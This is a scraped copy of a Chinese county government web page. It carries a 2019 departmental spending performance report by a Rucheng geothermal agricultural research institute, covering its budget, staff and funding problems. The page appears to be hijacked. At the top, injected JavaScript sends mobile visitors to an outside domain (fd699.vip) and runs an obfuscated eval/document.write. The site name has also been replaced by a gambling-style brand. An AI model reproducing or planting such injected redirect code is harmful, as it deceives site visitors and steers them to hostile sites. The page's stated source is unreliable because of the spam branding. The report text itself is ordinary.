function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();


当前位置: 福德正神登录官网 > 信息公开 > 政府信息公开 > 法定主动公开内容 > 预算/决算 > 县财政预算

郴州市汝城地热农用研究所 福德正神部门整体支出绩效评价报告
发布时间: 2020-11-04 16:27来源:福德正神登录官网财政局作者:【字体: 浏览量:1

郴州市汝城地热农用研究所

2019年部门整体支出绩效评价报告

一、基本情况

(一)部门整体支出概况。

2019年部门决算收入198.65万元,其中:年初结转和结余28.92万元,本年财政拔款收入169.73万元。

2019年部门决算支出198.65万元,包括人员经费140.46万元(基本工资48.76万元、津贴补贴1.99万元、其他社会保障缴费0.54万元、绩效工资33.87万元、机关事业单位基本养老保险缴费13.83万元、其他工资福利支出0.29万元、医疗费15.2万元、奖励金13.24万元、住房公积金8.44万元,其他对个人和家庭的补助支出4.3万元),公用经费22.11万元(含党建、工会、三创、综治、扶贫等工作经费,以上费用按实报实销)及年末结转和结余36.08万元。其中 三公”经费2.32万元(公务招待费在0.03万元、公务用车购置及运行费2.29万元、因公出国(境)费0元) 

完成年初预算100%,实现当年收支平衡。

(二)部门整体支出绩效目标。

认真完成县委县政府或上级主管部门绩效考核的个性指标、坚持预决算公开、严格单位存量资金和资产管理、严控三公经费、进一步完善了内部管理制度建设,确保单位项目绩效总目标和阶段性目标的完成。

(三)部门整体支出或项目实施情况分析。

1、资金到位及使用情况:2019年财政拨入公共预算资金总额为198.65万元,其中拨入基本支出169.73万元,拨入上年结余28.92万元。

2资金管理情况:一是严格遵守预算法、政府采购法等法律法规,二是严格按照预算管理职责、预算编制程序、收支范围和内容等要求编制预算,三是坚持量入为出,收支平衡,强化厉行节约,严肃财经纪律,四是进一步完善了单位内部管理制度,确保项目资金专款专用,取得实效。

二、绩效评价工作情况

(一)绩效评价目的。

严格执行上级文件精神,认真履行好县委政府赋予我所的各项职能,合理利用和保护好我县地热资源,确保福泉山庄国有资产的保值增值,加强地热所改制人员的管理,确保上访为0

(二)绩效评价工作过程,主要包括前期准备、组织实施和分析评价等内容。

一是按照预算管理要求编制预算,二是严格支出执行预算。三是确保实效,力保收支出平衡,并略有节余。

三、主要绩效及评价结论

严格执行年初预算,确保单位正常运转,实现收支平衡。

四、存在的问题

一是每年人员经费及固定经费的预算逐年减少,单位可用财力与扶贫支出等逐年增加的矛盾日益突出,已影响了单位日常开支的正常运转。二是单位人少事多,抽调和外借人员现象严重(单位总人数12人,抽调中心工作和外借人员占6人),专业人员缺乏,严重制约单位绩效的正常发挥。

五、有关建议

随着改制退休人员的增加,其年终奖(第十三个月工资)等费用逐年增加,该费用单位已无力承担,这将形成新的信访隐患。建议财政能将该费用列入年初财政预算。

六、其他需要说明的问题:

   

郴州市汝城地热农用研究所

                                2020114

 

扫一扫在手机打开当前页